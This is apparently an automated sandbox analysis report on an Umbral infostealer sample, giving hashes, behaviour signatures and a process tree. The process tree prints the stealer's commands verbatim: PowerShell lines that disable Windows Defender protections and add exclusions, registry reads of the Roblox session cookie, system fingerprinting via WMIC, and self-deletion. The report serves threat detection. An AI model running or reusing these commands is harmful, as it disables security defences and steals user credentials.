Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12-05-2024 19:07

General

  • Target

    STEALERRR3000PRO.exe

  • Size

    231KB

  • MD5

    5a006cd74e0225a15746bee6928d62f1

  • SHA1

    a17dabdb634d9667c3590436998252148a5fab92

  • SHA256

    0350fdb32852f781665e056a04f318e94c746612f7b4e3cd430d808c894aae4c

  • SHA512

    59d6b467cf48cf1aafaf13e1acfdd6ae4806403f0bc92e759590b04da4ecd719488300ecd412d92931e7b65daf0ab2229d7a165b31595334676b40942bb30f81

  • SSDEEP

    6144:xloZM9rIkd8g+EtXHkv/iD4gQYPDJ6idFIJbGmTTNb8e1mvmoii:DoZOL+EP8gQYPDJ6idFIJbGmTxro3

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe
    "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"
      2⤵
      • Views/modifies file attributes
      PID:5076
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2712
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2936
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3884
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3220
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:688
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3156
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:3960
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe" && pause
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • Runs ping.exe
          PID:2424

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      2e8eb51096d6f6781456fef7df731d97

      SHA1

      ec2aaf851a618fb43c3d040a13a71997c25bda43

      SHA256

      96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

      SHA512

      0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      441a842138038e6385e430a90d7ea608

      SHA1

      7b3712d2cdd37e10ee9b3994131ee5175e920f01

      SHA256

      47592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c

      SHA512

      9dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      f29ff8b1e0f396a194a6782749830b8e

      SHA1

      2f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69

      SHA256

      5bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f

      SHA512

      0689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e8ad350bb24c7ab38efd0ef0553239c7

      SHA1

      887c19e4c11de19854458e26a1ed05b67a75bf29

      SHA256

      5cf85b38cbbf1a064a4f8001a0ec031993d44e46b8e65d713785c84916cb8ffd

      SHA512

      74fef147e98b8b576712c212174a7793deb619d54c7ac7956e38ed4e09202f0c93ae4ec9e89cd4d0ac79c481d30c5c3fc5a3d042537c74d7bffda1f8453aef6e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxjord2t.4lc.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1748-35-0x000001E1E9C20000-0x000001E1E9C3E000-memory.dmp

      Filesize

      120KB

    • memory/1748-70-0x000001E1E9DA0000-0x000001E1E9DB2000-memory.dmp

      Filesize

      72KB

    • memory/1748-69-0x000001E1E9D70000-0x000001E1E9D7A000-memory.dmp

      Filesize

      40KB

    • memory/1748-0-0x00007FFEBB1D3000-0x00007FFEBB1D5000-memory.dmp

      Filesize

      8KB

    • memory/1748-87-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/1748-2-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/1748-1-0x000001E1CF5F0000-0x000001E1CF630000-memory.dmp

      Filesize

      256KB

    • memory/1748-34-0x000001E1E9E50000-0x000001E1E9EA0000-memory.dmp

      Filesize

      320KB

    • memory/1748-33-0x000001E1E9DD0000-0x000001E1E9E46000-memory.dmp

      Filesize

      472KB

    • memory/3132-12-0x0000027FFD120000-0x0000027FFD142000-memory.dmp

      Filesize

      136KB

    • memory/3132-19-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/3132-16-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/3132-15-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/3132-14-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/3132-13-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB

    • memory/3132-3-0x00007FFEBB1D0000-0x00007FFEBBC92000-memory.dmp

      Filesize

      10.8MB